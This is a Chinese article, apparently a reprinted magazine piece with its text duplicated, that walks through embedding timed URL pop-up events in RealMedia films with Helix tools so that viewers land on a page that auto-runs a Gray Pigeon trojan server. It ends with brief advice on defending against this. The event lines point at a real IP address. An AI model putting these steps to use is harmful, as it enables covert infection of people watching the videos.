论文部分内容阅读
如今,各种病毒木马伪装越来越好,你曾想过在看电影的时候也会中招?影片木马正是充分利用了这一入侵思路,它非常巧妙地将自己“融入”到人们喜欢的影片中,在人们最不易设防的影片中潜伏了下来。一旦用户下载并观看影片,那么潜伏的木马就发作了!
RM影片木马制作实战
躲藏得非常隐蔽的影片木马到底是如何制作的呢?下面我们一起来看看。制作RM影片木马需要两个步骤:一是让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页,这一点很容易做到。二是在指定的网页中要放置恶意代码、病毒等程序。两者结合后,就是一个标准的RM影片木马了。下面,我们来看看制作过程。
让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页这一步的制作,需使用Helix Producer Plus来完成。
在下载完毕并安装完成后,首先使用任一款播放器打开要捆绑弹出网页代码的RM影片,在其中观察一下影片播放的时间长度。在如图所示中,可以看出影片的长度是10分21秒。(图1)
根据影片的总长度,我们可以决定在影片中隔多少时间放一次弹出网页代码,从而使影片的播放中处处“危机四伏”。假设,我们打算实现如下目的:
在影片“009.rm”的播放中,在00:01:01至00:01:30这个时间范围中,自动弹出“http:// ***.93.223.135/index.asp”页面。
在影片“009.rm”的播放中,在00:03:00至00:03:30这个时间范围中,自动弹出“http:// ***.93.223.135/web/index.asp”页面。
根据这个目标,开始在RM中捆绑网页弹出代码,方法如下:
(1)新建一个文本文件,在其中输入如下命令:
u 00:01:01 00:01:30 http://218.93.223.135/index.asp
u 00:03:00 00:03:30 http://218.93.223.135/web/index.asp
输入完毕后,将文件保存成名为“001”(可以任意命名)的文本文件。如图2所示。
现在解释一下代码的含义,以第一行代码为例,代码中的u表示URL事件,这个事件将激活IE浏览器的自动弹出;00:01:00是起始时间;00:01:30.001:10是结束时间;后面则是指定的要自动打开的网页。
(2)进入“C:\Program Files
Real\Helix Producer Plus\RealMe
diaEditor\”文件夹,找到名为Rmedtgui.exe文件。
(3)双击运行Rmedtgui.exe文件后,在弹出的如图所示窗口中,依次单击“File”→“Open RealMedia File”菜单。(图3)
(4)在将名为“009.rm”的文件添加进来后,再依次单击“Tools”→“Merge Events”菜单。如图4所示。
(5)在弹出的对话框中,将前面生成的名为“001.txt”文件添加进来。
(6)在单击“打开”按钮后,将出现如图所示的合并事件进度框。(图5)
(7)在合并完成后,依次单击“File”→“Save RealMedia File As”菜单。将写入事件的RM文件另存为一个新的RM文件,如图所示的“0091.rm”。(图6)
(8)稍后,将出现保存过程,这个过程将会把写入事件后的RM文件创建出来。保存完毕后,将Rmedtgui.exe窗口关闭。并用RealPlayer播放生成的00.91文件,在播放到指定时间时,就会自动弹出浏览窗口(RealPlayer内置了浏览器,所以会使用内置的浏览器。),并打开指定的网页页面内容。
(9)在第一步成功完成后,就可以进行第二步的在网页中添加木马的操作了。添加的木马的操作有两步:一是使用灰鸽子等木马工具制作出一个服务器端。如图7所示。二是使用制作网页木马工具,指定访问特定的网页时能够自动运行灰鸽子服务器端。如图8所示。
接着,将具有灰鸽子服务器端和能够调用灰鸽子服务器端的网页一起上传到服务器指定的路径。
RM影片木马的防范
在明白了RM影片木马的危害后,现在再来看看如何防范RM影片木马。通常,我们可以使用如下的几种方法来解决问题:
第一种是不使用RealPlayer播放RM文件,推荐使用KMPlayer这类第三方播放器进行播放,这样RM影片中的自动弹出代码将不会被响应,这是一种完全被动的防御方法。
第二种是使用各种防火墙禁止RealPlayer对网络的访问。其优势是RealPlayer无法使用内置的浏览器连接至指定的网页,进而杜绝了网页中的木马服务器端的下载。其不足之处是在线播放的影片没法使用RealPlayer看了。
第三种方法是下载专用清除工具,如“Real文件广告清除工具”这类的工具,就可以把RM影片中内置的恶意代码清除掉,这是一种比彻底的解决方法。如图9所示。
最后,要说明的是,除了RM影片木马外,实际上还有很多种影片都可以被人为地添加上木马或恶代码,针对这种问题,对于电脑初学者来说,目前比较好的解决方法仍是使用第三方播放器,或是使用防火墙禁用播放器的网络访问功能来临时解决问题。
注:本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文。
RM影片木马制作实战
躲藏得非常隐蔽的影片木马到底是如何制作的呢?下面我们一起来看看。制作RM影片木马需要两个步骤:一是让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页,这一点很容易做到。二是在指定的网页中要放置恶意代码、病毒等程序。两者结合后,就是一个标准的RM影片木马了。下面,我们来看看制作过程。
让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页这一步的制作,需使用Helix Producer Plus来完成。
在下载完毕并安装完成后,首先使用任一款播放器打开要捆绑弹出网页代码的RM影片,在其中观察一下影片播放的时间长度。在如图所示中,可以看出影片的长度是10分21秒。(图1)
根据影片的总长度,我们可以决定在影片中隔多少时间放一次弹出网页代码,从而使影片的播放中处处“危机四伏”。假设,我们打算实现如下目的:
在影片“009.rm”的播放中,在00:01:01至00:01:30这个时间范围中,自动弹出“http:// ***.93.223.135/index.asp”页面。
在影片“009.rm”的播放中,在00:03:00至00:03:30这个时间范围中,自动弹出“http:// ***.93.223.135/web/index.asp”页面。
根据这个目标,开始在RM中捆绑网页弹出代码,方法如下:
(1)新建一个文本文件,在其中输入如下命令:
u 00:01:01 00:01:30 http://218.93.223.135/index.asp
u 00:03:00 00:03:30 http://218.93.223.135/web/index.asp
输入完毕后,将文件保存成名为“001”(可以任意命名)的文本文件。如图2所示。
现在解释一下代码的含义,以第一行代码为例,代码中的u表示URL事件,这个事件将激活IE浏览器的自动弹出;00:01:00是起始时间;00:01:30.001:10是结束时间;后面则是指定的要自动打开的网页。
(2)进入“C:\Program Files
Real\Helix Producer Plus\RealMe
diaEditor\”文件夹,找到名为Rmedtgui.exe文件。
(3)双击运行Rmedtgui.exe文件后,在弹出的如图所示窗口中,依次单击“File”→“Open RealMedia File”菜单。(图3)
(4)在将名为“009.rm”的文件添加进来后,再依次单击“Tools”→“Merge Events”菜单。如图4所示。
(5)在弹出的对话框中,将前面生成的名为“001.txt”文件添加进来。
(6)在单击“打开”按钮后,将出现如图所示的合并事件进度框。(图5)
(7)在合并完成后,依次单击“File”→“Save RealMedia File As”菜单。将写入事件的RM文件另存为一个新的RM文件,如图所示的“0091.rm”。(图6)
(8)稍后,将出现保存过程,这个过程将会把写入事件后的RM文件创建出来。保存完毕后,将Rmedtgui.exe窗口关闭。并用RealPlayer播放生成的00.91文件,在播放到指定时间时,就会自动弹出浏览窗口(RealPlayer内置了浏览器,所以会使用内置的浏览器。),并打开指定的网页页面内容。
(9)在第一步成功完成后,就可以进行第二步的在网页中添加木马的操作了。添加的木马的操作有两步:一是使用灰鸽子等木马工具制作出一个服务器端。如图7所示。二是使用制作网页木马工具,指定访问特定的网页时能够自动运行灰鸽子服务器端。如图8所示。
接着,将具有灰鸽子服务器端和能够调用灰鸽子服务器端的网页一起上传到服务器指定的路径。
RM影片木马的防范
在明白了RM影片木马的危害后,现在再来看看如何防范RM影片木马。通常,我们可以使用如下的几种方法来解决问题:
第一种是不使用RealPlayer播放RM文件,推荐使用KMPlayer这类第三方播放器进行播放,这样RM影片中的自动弹出代码将不会被响应,这是一种完全被动的防御方法。
第二种是使用各种防火墙禁止RealPlayer对网络的访问。其优势是RealPlayer无法使用内置的浏览器连接至指定的网页,进而杜绝了网页中的木马服务器端的下载。其不足之处是在线播放的影片没法使用RealPlayer看了。
第三种方法是下载专用清除工具,如“Real文件广告清除工具”这类的工具,就可以把RM影片中内置的恶意代码清除掉,这是一种比彻底的解决方法。如图9所示。
最后,要说明的是,除了RM影片木马外,实际上还有很多种影片都可以被人为地添加上木马或恶代码,针对这种问题,对于电脑初学者来说,目前比较好的解决方法仍是使用第三方播放器,或是使用防火墙禁用播放器的网络访问功能来临时解决问题。
注:本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文。